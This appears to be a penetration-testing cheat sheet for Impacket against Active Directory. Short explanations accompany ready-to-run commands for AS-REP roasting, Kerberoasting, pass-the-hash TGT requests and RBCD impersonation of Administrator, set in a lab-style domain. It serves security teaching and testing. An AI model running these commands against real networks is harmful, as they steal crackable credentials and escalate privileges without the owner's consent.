📦Impacket

Impacket is a collection of Python classes for working with network protocols. This guide covers common security testing techniques using Impacket tools for Active Directory environments.

AS-REP Roasting (GetNPUsers)

AS-REP Roasting is an attack technique that targets user accounts that have "Do not require Kerberos preauthentication" enabled. This allows attackers to request authentication data for any user and receive an encrypted TGT that can be cracked offline.

AS-REP Roasting with User List

# AS-REP Roasting using a user list from 'users.txt'
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/null

AS-REP Roasting for Specific User

# AS-REP Roasting for a specific user
impacket-GetNPUsers domain.htb/user -no-pass 2>/dev/null

Kerberoasting Attack (GetUserSPNs)

Kerberoasting is an attack technique that targets service accounts in Active Directory. It involves requesting service tickets for Service Principal Names (SPNs) and attempting to crack the encrypted portion offline.

Kerberoasting with Valid Credentials

# Kerberoasting Attack with valid credentials and NTLM authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -request 2>/dev/null
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user:'password' -request 2>/dev/null

Kerberoasting with Kerberos Authentication

# Kerberoasting Attack using Kerberos authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.domain.htb domain.htb/user -k -no-pass -request 2>/dev/null

Kerberoasting without Domain Credentials

# Kerberoasting without domain credentials but with AS-REP Roast user
# Requires user list in 'users.txt'
impacket-GetUserSPNs -no-preauth 'asrep-user' -request -usersfile users.txt domain.htb/ -dc-ip 10.10.10.161 2>/dev/null

Obtaining Ticket Granting Ticket [TGT] (getTGT)

The Ticket Granting Ticket (TGT) is used in Kerberos authentication to obtain service tickets. These commands show different methods to obtain a TGT.

TGT with Password Authentication

# Obtaining TGT using basic password authentication
impacket-getTGT domain.htb/user:'password' -dc-ip 10.10.10.10

TGT with NTLM Hash

# Obtaining TGT using NTLM Hash (Pass-the-Hash)
impacket-getTGT domain.htb/user -hashes :<NTLM_HASH> -dc-ip 10.10.10.10

TGT with Kerberos Authentication

# Obtaining TGT using Kerberos authentication
impacket-getTGT domain.htb/user -k -no-pass -dc-ip 10.10.10.10

Resource Based Constrained Delegation [RBCD] (getST)

Resource Based Constrained Delegation (RBCD) is a delegation mechanism that allows a service to impersonate users to other services. This attack technique can be used for privilege escalation.

RBCD with NTLM Authentication

# RBCD using NTLM authentication
impacket-getST -spn 'cifs/DC.domain.htb' -impersonate Administrator -dc-ip 10.10.10.10 'domain.htb'/'target_rbcd':'password' 2>/dev/null

RBCD with Pass-the-Hash

# RBCD using Pass-the-Hash technique
impacket-getST -spn 'cifs/DC.domain.htb' -impersonate Administrator -dc-ip 10.10.10.10 'domain.htb'/'target_rbcd' -hashes :<NTLM_HASH> 2>/dev/null

RBCD with Kerberos Authentication

# RBCD using Kerberos authentication
impacket-getST -spn 'cifs/DC.domain.htb' -impersonate Administrator -dc-ip 10.10.10.10 'domain.htb'/'target_rbcd' -k -no-pass 2>/dev/null

Important Notes

• Replace domain.htb with your target domain

• Replace IP addresses with appropriate target IPs

• Ensure you have proper authorization before conducting any security testing

• These techniques should only be used in authorized penetration testing scenarios

• Always follow responsible disclosure practices

Prerequisites

• Impacket toolkit installed

• Network access to target domain controller

• Appropriate permissions for security testing activities